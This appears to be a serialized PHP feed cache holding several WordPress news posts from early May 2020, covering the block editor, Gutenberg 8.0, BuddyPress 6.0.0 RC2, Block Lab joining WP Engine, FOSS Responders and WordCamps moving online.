The block system is not going anywhere. WordPress has moved beyond the point where we should consider the block editor as a separate entity. It is an integral part of WordPress and will eventually touch more and more areas outside of the editing screen.

\n\n\n\n

Frankly, it would be poor journalism to not cover stories related to blocks.

\n\n\n\n

Some of the most exciting things happening in the WordPress ecosystem is around what developers are doing with blocks. Whether it is a fun T-rex game, a block-ready theme, or a team of block developers being hired by a major company, there is always something interesting happening in the world of blocks.

\n\n\n\n

Every day, more users are embracing the block editor. Even the percentage of holdouts still running WordPress 4.9, which was the last version without the block editor, is decreasing. Currently, only 12.8% of WordPress installs are on 4.9. Nearly 73% are running WordPress 5.0 or newer. Some of those users are running plugins like Classic Editor, which has maintained a steady growth rate in the neighborhood of 0.5% – 1.0% in recent months. Currently, the plugin has over 5 millions installs, which is a drop in the ocean in comparison to total WordPress sites.

\n\n\n\n

At the moment, WordPress.com and self-hosted Jetpack users are creating content via blocks on 44.5 million WordPress sites. Yesterday, those users wrote 302,000 posts in the block editor.

\n\n\n\n

Blocks are the future of the platform. What we need to do as a community is avoid putting our heads in the sand or railing against the powers-that-be. Instead, we should ask ourselves what we could do to continue improving the system. How can we move forward? How can we present our ideas, even dislikes, in a constructive manner? How can we create better software?

\n\n\n\n

Criticism of the editor is fair. Make it constructive so we can dissect and address that criticism. That is an essential part of building great software.

\n\n\n\n

Truth #2: Love of Blocks

\n\n\n\n

Believe it or not, I actually love blocks. While I may criticize some decisions about the editor, summoning an internal facepalm emoji at times, this is the most excited I have been about WordPress in years. But, it is not about me. I have enough familiarity with dozens of editors that I can live with even the most mediocre of experiences. And, if I am not satisfied, I can build my own.

\n\n\n\n

What it is about is seeing the face of an inexperienced WordPress user light up for the first time because they get it.

\n\n\n\n

For years, I helped an older family member run an outdoors site. I had no interest in hunting, fishing, or most other topics covered on the blog. However, he was passionate about what he was doing. I wanted to help fuel that passion in any way I could. The problem? He simply never learned how WordPress worked. He never had that lightbulb moment. His face never glowed when he finally figured out how to lay out his content in the editor.

\n\n\n\n

He had big ideas and no way to accomplish them.

\n\n\n\n

At the time, most page builders were little more than shortcode soup, which I knew would eventually mean I would be the one to clean up the mess. There were few options other than the classic editor. My older cousin stuck it out for longer than most. After a few years, he finally let the site go.

\n\n\n\n

Even some of what I would consider the most basic of things were too frustrating for him. It was also frustrating for me because I could not understand why he could never learn what I was teaching.

\n\n\n\n

However, the block editor changed things. He was thinking of starting a new site but was asking about non-WordPress platforms. I spun up a demo install and a basic block-ready theme for him not long ago. Suddenly, this guy who routinely broke links and accidentally made all of his blog post content bold — twice — was piecing together media-filled content with few issues. That initial passion that he had all those years ago seemed to come back. Maybe, just maybe, WordPress might now be the CMS for him.

\n\n\n\n

I am fully aware that this is not everyone’s experience. However, what I have found working with new and less-than-tech-savvy users is that the block editor is a stepping stone toward them being able to create the sites they want more easily. Right now, those users have far more control over their content than ever before. In the future, they will have that control over their entire site.

\n\n\n\n

When I share a story about blocks, it is because I am excited about them. More so, I want to share that excitement with others who are on this journey. Whether they want something on the wacky and weird side of things or want to build custom patterns for reuse in their posts, I want them to find those tools.

\n\n\n\n

If I am a bit optimistic about the future at times, I will not apologize for that. I look forward to the next block-related story that we have the opportunity to cover here at the Tavern.

\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 04 May 2020 20:52:38 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:54:\"WordPress.org blog: The Month in WordPress: April 2020\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://wordpress.org/news/?p=8571\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:69:\"https://wordpress.org/news/2020/05/the-month-in-wordpress-april-2020/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:8157:\"

April continued to be a challenging time for the WordPress community, with many under stay-at-home recommendations. However, it was also an exciting month in which we created new ways to connect with and inspire each other! This month, amazing contributors moved more WordCamps online and shipped new releases for WordPress and Gutenberg. For the latest, read on. 

\n\n\n\n
\n\n\n\n

WordPress 5.4.1 released

\n\n\n\n

On April 24th,  WordPress 5.4.1 Release Candidate 1 (RC1) was released for testing, quickly followed by the official release of WordPress 5.4.1 on April 29th. This security release features 17 bug fixes and seven security fixes, so we recommend updating your sites immediately. To download WordPress 5.4.1, visit your Dashboard, click on Updates, then Update Now, or download the latest version directly from WordPress.org. For more information, visit this post, review the full list of changes on Trac, or check out the version 5.4.1 HelpHub documentation page.

\n\n\n\n

Want to get involved in building WordPress Core? Follow the Core team blog, and join the #core channel in the Making WordPress Slack group.

\n\n\n\n

Gutenberg 7.9 and 8.0 released

\n\n\n\n

It was another exciting month for Gutenberg, with the release of 7.9 and 8.0! Version 7.9 brought new block design tools, three new patterns, and improved block markup. Gutenberg 8.0 continued to refine the new block patterns feature, with additional options for inline formatting, and extending the functionality of the Code Editor. In addition to these new features, both releases included new enhancements and APIs, along with a number of bug fixes, performance improvements, some experiments, and more! You can read all the details about the latest Gutenberg releases in the announcement posts for 7.9 and 8.0

\n\n\n\n

Want to get involved in building Gutenberg? Follow the Core team blog, contribute to Gutenberg on GitHub, and join the #core-editor channel in the Making WordPress Slack group.

\n\n\n\n

BuddyPress 6.0.0

\n\n\n\n

BuddyPress 6.0.0-beta2 was released for testing in mid-April, leading to the BuddyPress 6.0.0 Release Candidate, announced on April 29. This is an important step before  the final release of BuddyPress 6.0.0, which is slated for Thursday, May 14. Changes and new features in this release include moving the profile photo and user cover image under the BP Members component, and a new BP Rest API. Additionally, this release will introduce the first round of BuddyPress Blocks! Last, but not least, BuddyPress 6.0.0 will require at least PHP 5.6 and WordPress 4.8. 

\n\n\n\n

Want to get involved? Test the 6.0.0-RC here! You can also help by translating BuddyPress into another language, or let the team know of any issues you find, either in the support forums and/or in their development tracker

\n\n\n\n

WordCamp US goes online, apply to speak!

\n\n\n\n

WordCamp US will take place online due to the COVID-19 pandemic. The event still runs from October 27-29, 2020, and will be free to anyone who wishes to attend. The team plans to offer  what WCUS has historically brought to the community in person: sessions and workshops, Contributor Day, a hallway track, and of course, State of the Word. 

\n\n\n\n

Interested in speaking at WCUS? The Call for Speakers is still open! You can apply to speak on the speaker application site until May 31, 2020 at 11:59 pm CDT (UTC-5). 

\n\n\n\n

Additionally, the Call for Cities is also open. If your community is interested in hosting WordCamp US in 2021 & 2022, please fill out this application

\n\n\n\n

For the latest information about WordCamp US, sign up for updates on the website, or follow Facebook, Twitter, or Instagram

\n\n\n\n

WordCamp Europe 2020 goes virtual 

\n\n\n\n

Last month, WordCamp Europe decided to postpone its Porto event to 2021. This April, the WCEU organizing team announced that the 2020 WordCamp will be online! WordCamp Europe 2020 Online will take place from June 4-6, 2020, and tickets will be free. There will be a virtual Contributor Day on June 4, and then two half days of live-streamed talks and workshops. To participate, get your free ticket here

\n\n\n\n

To get the latest news for WordCamp Europe 2020 Online, follow on Facebook, Twitter, LinkedIn, or on Instagram

\n\n\n\n
\n\n\n\n

Further Reading

\n\n\n\n\n\n\n\n

Have a story that we should include in the next “Month in WordPress” post? Please submit it here.

\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 04 May 2020 09:31:22 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"Angela Jin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:48:\"BuddyPress: BuddyPress 6.0.0 Release Candidate 2\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"https://buddypress.org/?p=311439\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"https://buddypress.org/2020/05/buddypress-6-0-0-release-candidate-2/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2943:\"

Hello,

\n\n\n\n

The second release candidate for BuddyPress 6.0.0 is now available for an ultimate round of testing!

\n\n\n\n

Since the first release candidate and thanks to the WordPress Polyglots Team (Many thanks to @tobifjellner & @ocean90), we’ve found an issue involving the translation of our new BuddyPress Blocks. The BP Blocks are using JavaScript i18n functions and a specific task of our build process was preventing GlotPress from identifying the strings needing to be translated.

\n\n\n\n

We believe we’ve fixed this issue and this new release candidate will help us confirm it.

\n\n\n\n

BuddPress 6.0.0 is still slated for release on Thursday, May 14, and if you haven’t tried 6.0.0 yet, it’s probably your last chance to do so!

\n\n\n\n

You can test the 6.0.0-RC2 pre-release in 4 ways :

\n\n\n\n\n\n\n\n

A detailed changelog will be part of our official release note, but you can get a quick overview by reading the post about the 6.0.0 Beta1 release.

\n\n\n\n
\n\n\n\n

Polyglots contributors, there’s some extra work.

\n\n\n\n

This release candidate should introduce around 50 new strings to translate (the ones that were not included previously due to the issue), so thanks in advance for your comprehension and for your help .

\n\n\n\n
\n\n\n\n

As usual, if you think you’ve found a bug, please let us know reporting it on the support forums and/or on our development tracker.

\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 03 May 2020 04:45:08 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Mathieu Viet\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:99:\"WPTavern: FOSS Responders Group Brings Financial Help to Open Source Ecosystem Affected by COVID-19\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://wptavern.com/?p=99213\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:243:\"https://wptavern.com/foss-responders-group-brings-financial-help-to-open-source-ecosystem-affected-by-covid-19?utm_source=rss&utm_medium=rss&utm_campaign=foss-responders-group-brings-financial-help-to-open-source-ecosystem-affected-by-covid-19\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2003:\"

The pandemic has caused economic hardships and upheaval in nearly every industry. Open source communities and contributors have been affected in a myriad of ways – whether it’s a loss of donations, the burden of nonrefundable travel expenses for canceled conferences, or severely diminished business and fundraising opportunities.

\n\n\n\n

FOSS Responders is a working group of volunteers that aims to future-proof the open source infrastructure we rely on by helping sustain those who maintain the software. The group’s website allows those in need to apply for emergency funds. FOSS Responders is raising money on Open Collective and 100% of donations go to open source technologists in need. So far the group has an estimated annual budget of $8,145.05. Open Collective is also waiving its platform fees on COVID-19 solidarity collectives until the end of June.

\n\n\n\n

On May 22, FOSS Responders plans to host a virtual funding event to provide financial support for organizations affected by the profound economic disruptions caused by the pandemic. Organizers have a $5,000 goal for ticket revenue from general event ticket sales.

\n\n\n\n

In addition to providing emergency funds, the FOSS Responders group is aiming to address non-financial needs. Open source projects that relied heavily on events for fundraising need help amplifying their projects and recruiting volunteers. FOSS Responders is also creating a Resource Center for projects to find tips and tricks on how to manage fully virtual community interactions and events. Anyone with a skill or service to volunteer can get in touch on the FOSS Responders website and the team will work as matchmakers to connect experts with projects that need help.

\n\n\n\n

\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 01 May 2020 23:04:29 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:79:\"WPTavern: Block Lab Team Joins WP Engine, Looks to the Future of Block Building\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://wptavern.com/?p=98935\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:201:\"https://wptavern.com/block-lab-team-joins-wp-engine-looks-to-the-future-of-block-building?utm_source=rss&utm_medium=rss&utm_campaign=block-lab-team-joins-wp-engine-looks-to-the-future-of-block-building\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5636:\"

The three-person Block Lab team of Luke Carbis, Ryan Kienstra, and Rob Stinson is joining WP Engine to work on the company’s block editor projects. WP Engine approached the team members after seeing how successful the Block Lab project had grown and made them an offer. The team will be able to continue building projects with solid financial backing.

\n\n\n\n

Block Lab is a plugin that was created to allow other developers to build blocks without needing to wade through the depths of complex JavaScript programming. It is a way to get your feet wet in the block development pool without diving in head first. The plugin has built a solid reputation based on user reviews. Out of 39 submissions, it has received 38 five-star ratings.

\n\n\n\n

“From the start, Block Lab has been our answer to the question of ‘how can I lower the barrier to entry for creating custom blocks,\'” said Stinson. He said the plugin has done two important things for developers. It has given them an easy-to-use admin interface to work from and a simplified templating experience that is aligned with traditional workflows. “It’s helped folk who haven’t had the time to summit the JS-all-the-things mountain or simply provide those that are looking for a standardized system that does a lot of the heavy lifting for them.”

\n\n\n\n

The Block Lab plugin is being phased out, but the team assures that the plugin’s current users will not be left in the dust. The plan is to continue supporting the plugin through bug and compatibility fixes for the next year. Pro users will also receive the same support until their license expires. In the long term outlook, the team plans to build a migration path to the new tools they will be building under the WP Engine banner.

\n\n\n\n

Stinson said that the plugin should work well for a long time to come because it was built by Carbis and Kienstra, two of the best engineers he has worked with. However, he stresses that the work they will be doing with WP Engine will exceed anything they have done with Block Lab.

\n\n\n\n

“We’ll be working on technology there that is focused on the Block Editor though, and a part of that will be taking what we’ve done with Block Lab and introducing the feature set to the WP Engine suite of products,” he said. “The alignment will be close and will offer existing Block Lab users an easy migration experience.”

\n\n\n\n

While the Block Lab plugin will see an end, the features the team has worked on will live on in some form.

\n\n\n\n

A New Beginning

\n\n\n\n

Before taking on roles with WP Engine, each member of the Block Lab team was paying the bills through agency and freelance work. Block Lab was merely a side project they were handling in their free time, but it was slowly growing both in scale and financially.

\n\n\n\n

“Getting to a place where we could give it full-time focus was easily two to three years away though,” said Stinson, “and we have always been incredibly conscious of the things we wanted to be doing with it and how much the time factor was a limitation. With WP Engine, we’re equipped to take the product vision we had for Block Lab and basically strap a rocket to it. Not only are we able to devote our full attention, but we also have the incredible support and resources of WP Engine behind us.”

\n\n\n\n

Stinson is looking forward to the transition within the state of the current WordPress ecosystem. The team can walk into a fresh beginning with the full weight of a major company behind them. “Between the classic way of building with WordPress and this new block-first frontier, being set up right now to build and contribute is incredible!” he said.

\n\n\n\n

The team had an existing roadmap and backlog of features they wanted to develop. However, with Block Lab being only a side project, it meant those features would have taken much longer to build. They can now pursue them full time.

\n\n\n\n

“We saw what Block Lab has currently as a necessary baseline for a plugin that equipped folks to create custom blocks, but what we have planned and are dreaming about goes so much further,” said Stinson. “Joining WP Engine unleashes us to chase down that work faster and with more focus. Another really exciting piece of this is that with our focus we are better positioned to offer insights and contribution to the larger block editor project through core and community contributions.”

\n\n\n\n

The team now has the opportunity to be a pioneer in the years to come. They have proved they can build a useful tool on top of the block editor. The next step is seeing where they take it and whether they can get more developers to join them into a world of building blocks.

\n\n\n\n

“The shift in thinking around how a website is structured towards one that is powered by ‘blocks’ is a journey that the majority of the WP community is still on,” said Stinson. “A big part of my vision is having a larger portion of the community up to speed and onboard with this. With more people operating within that zone, more great work and tooling will be produced. By lowering the barrier to entry through Block Lab and what we have planned at WP Engine, it will help to get more people in that zone.”

\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 01 May 2020 17:16:06 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:63:\"WPTavern: WordCamp US 2020 Goes Online, Cancels In-Person Event\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://wptavern.com/?p=99149\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:169:\"https://wptavern.com/wordcamp-us-2020-goes-online-cancels-in-person-event?utm_source=rss&utm_medium=rss&utm_campaign=wordcamp-us-2020-goes-online-cancels-in-person-event\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3758:\"

WordCamp US 2020 organizers have cancelled the in-person event in favor of hosting it as an online-only conference. With more than a million confirmed coronavirus cases in the U.S. today, 63,000+ deaths, and 31 states set to partially reopen this weekend, the pandemic’s trajectory throughout the country has become increasingly uncertain.

\n\n\n\n

Many statewide stay-at-home orders are expiring tomorrow, despite no state having met the federal guidelines for reopening. Some businesses are opting to reopen in a limited capacity, but the general populace is still wary of returning to their previous way of life. In the state of Missouri, where WordCamp US was to be hosted in 2020, there will be no limitations on social gatherings as of May 4, as long as individuals maintain social distancing. It’s not yet possible to predict what will be happening in the area in October or how it might impact an event with international attendees.

\n\n\n\n

After organizers extended the WCUS speaker application deadline for another 1.5 months on April 17, it seemed the general disinclination towards traveling and gathering in large groups had already taken hold. Booking hotels and travel arrangements five months in advance is still too much of a gamble for speakers and attendees.

\n\n\n\n

The WCUS organizing team emphasized the longterm health and safety of the WordPress community as their primary concern in today’s announcement about moving to an online-only event:

\n\n\n\n

The WCUS organizing team has been working with WordCamp Central and local health authorities to try to make sense of the current COVID-19 pandemic and what it means for our event in St. Louis this October. Throughout this, we have held the longterm health and safety of the WordPress community as the highest priority of our event. To move forward in a way that honors what is best for our community – both locally and globally – we have made the hard choice to convert WordCamp US 2020 to an online only event. 

\n\n\n\n

WCUS will still happen on the originally scheduled dates, October 27th – 29th. Organizers plan to run sessions, workshops, and a virtual Contributor Day, along with the annual State of the Word address from Matt Mullenweg. They are also putting together a hallway track, some form of swag, and creative ways for attendees to connect, which will be announced at a later date.

\n\n\n\n

WCUS is now free for anyone who wants to attend. Without the necessity to rent a venue, provide lunches, and other physical aspects of the event, sponsorships are easily able to cover the cost of streaming to an unlimited number of attendees.

\n\n\n\n

The call for speakers is open until May 31, 2020 at 11:59 pm CDT. WCUS is still accepting sponsorships and will be publishing a set of unique sponsorship packages for the virtual event. Organizers plan to put out a call for volunteers in the near future.

\n\n\n\n

WordCamp US follows other major regional WordCamps in Asia and Europe that have canceled in-person events due to the pandemic. Several other upcoming WordCamps, including events in Spain, Kent, Denver, and Minneapolis / Saint Paul, have also announced that they are transitioning to online-only events.

\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 30 Apr 2020 22:49:16 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:103:\"WPTavern: Gutenberg 8.0 Merges Block and Pattern Inserter, Adds Inline Formats, and Updates Code Editor\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://wptavern.com/?p=99130\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:247:\"https://wptavern.com/gutenberg-8-0-merges-block-and-pattern-inserter-adds-inline-formats-and-updates-code-editor?utm_source=rss&utm_medium=rss&utm_campaign=gutenberg-8-0-merges-block-and-pattern-inserter-adds-inline-formats-and-updates-code-editor\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5033:\"

The team behind the Gutenberg plugin shipped version 8.0 yesterday. The update adds some nice user-facing changes, including a merged block and pattern inserter, new inline formatting options, and visual changes to the code editor. Over two dozen bug fixes were included in the release, along with several enhancements.

\n\n\n\n

Designers on the project updated the welcome box illustrations to match the current UI. Because the welcome modal should already be dismissed for current users, only new users should see these changes.

\n\n\n\n

For theme authors, the post title and placeholder paragraph text for the block appender will inherit body font styles. Previously, they had specific styles attached to them in the editor. The current downside is that the post title is not an <h1> element so it cannot automatically inherit styles for that element. However, that will change once the post title becomes a true block in the editor.

\n\n\n\n

The editor also now clears centered blocks following a floated block. This is an opinionated design change, but it should not negatively affect most themes. However, theme authors should double-check their theme styles to be sure.

\n\n\n\n

Updated Block and Pattern Inserter

\n\n\n\nPatterns available in the inserter.\n\n\n\n

The development team added patterns to the existing inserter. Now, both blocks and patterns have an individual tab within a unified interface. This is yet another step in the evolution of the pattern system that should land in core WordPress this year.

\n\n\n\n

Right now, the experience is a two-steps-forward-one-step-back deal. The inserter’s behavior has improved and it is great to see patterns merged into it. However, all blocks and patterns are within long lists that require scrolling to dig through. Block categories are no longer tabbed in version 8.0, which is a regression from previous versions. I am certain this will be resolved soon enough, but it is a little frustrating locating a block in the list at the moment.

\n\n\n\n

Merging patterns into the inserter is an ongoing process. There is still a lot of work to do before the final product is polished and included in core WordPress.

\n\n\n\n

The following are some key items that need to be addressed in upcoming versions of Gutenberg:

\n\n\n\n\n\n\n\n

Of course, there is a host of other minor and major issues the team will need to cover to nail down the user experience. For now, the interface for patterns continues to improve.

\n\n\n\n

Subscript and Superscript Formats

\n\n\n\nAdding superscript text to the editor.\n\n\n\n

Gutenberg developers added two new inline formatting options to the editor toolbar: subscript and superscript. These options allow users to add text such as X2 and X2. They work the same as bold, italic, inline code, and other options.

\n\n\n\n

The two formatting options represent their respective inline HTML tags, <sub> for subscript and <sup> for superscript. With the addition of the elements, the toolbar now covers most of the widely-used inline HTML tags. The only other tags that are low on my wish list are <abbr>, <del>, and <ins>, but I could live with those remaining firmly in plugin territory.

\n\n\n\n

Improved Code Editor

\n\n\n\nUpdated code-editing view.\n\n\n\n

The code editor received a much-needed overhaul in the 8.0 update. Everything from the post title to the content is set in a monospace font, and the width of the code editing box spans the editing area. It should be a welcome change for those who need to switch to code view once in a while.

\n\n\n\n

The next step to polishing the code editor (and the HTML block) would be to add syntax highlighting. In the current version, the HTML output is plain text. Given the extra markup that the block editor produces, it can be a bit of a jumbled mess to wade through. Basic syntax highlighting would improve the experience several times over. There is a GitHub ticket for adding the feature, but it has not seen any movement in several months.

